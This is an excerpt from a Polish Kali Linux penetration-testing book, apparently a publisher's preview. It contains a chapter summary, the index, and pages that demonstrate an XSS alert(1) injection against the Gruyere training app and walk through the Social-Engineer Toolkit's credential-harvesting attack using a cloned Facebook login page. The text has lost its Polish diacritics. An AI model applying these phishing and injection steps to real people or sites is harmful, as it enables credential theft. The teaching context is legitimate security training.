PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
